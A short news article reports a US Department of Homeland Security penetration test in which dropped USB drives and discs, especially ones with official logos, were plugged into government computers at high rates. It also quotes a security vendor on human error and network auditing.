Penetration testing by the US Department of Homeland Security which involved dropping USB thumb drives and various data discs around the car parks of government agency buildings has revealed a not-so-shocking truth: just like most folk, government workers allow curiosity to trump security when faced with the opportunity to have a nosey at something they think they shouldn't be looking at.
Some 60 percent of those who picked up the thumb drives and discs went on to stick them straight into their company computers in order to see what they contained. The more that the drive or disc looked like it really might contain something 'official' and secret, those with an official looking logo stamped on them for example, the more likely people were to plug them in. In fact an amazing 90 percent of the drives with official logos that were picked up were installed.
Of course, this will come as absolutely no surprise to anyone who knows anything about both human nature and IT security. Stick baiting, as the process is known amongst the bad guys, is a remarkably simple and effective method of installing malware onto the networks of target businesses. This particular pen test proves that government departments are not immune to the curiosity factor when it comes to targeted attacks. The DOHS testers got their percentage numbers for this test because the drives were 'infected' with a basic call home routine, but this could just as easily have been truly malicious software such as a Trojan. That such high numbers of drives were able to successfully call home after installation suggests that network security at US government agencies is not as good as it could, and indeed should, be.
Ray Bryant, CEO at security experts Idappcom, says the pen test just proves that "there is no device known to mankind that prevents people from being idiots" and warns that when coupled with network security systems that are not properly installed can have disastrous consequences. Unsurprisingly (as his company markets such a thing) he recommends an additional automated security audit layer be added which won't prevent human error but would flag up where the network is vulnerable due to configuration problems. "To err is human" Bryant concludes " but to fail to compensate for those errors is an unnecessary risk".
Edited 5 Years Ago by Dani: n/a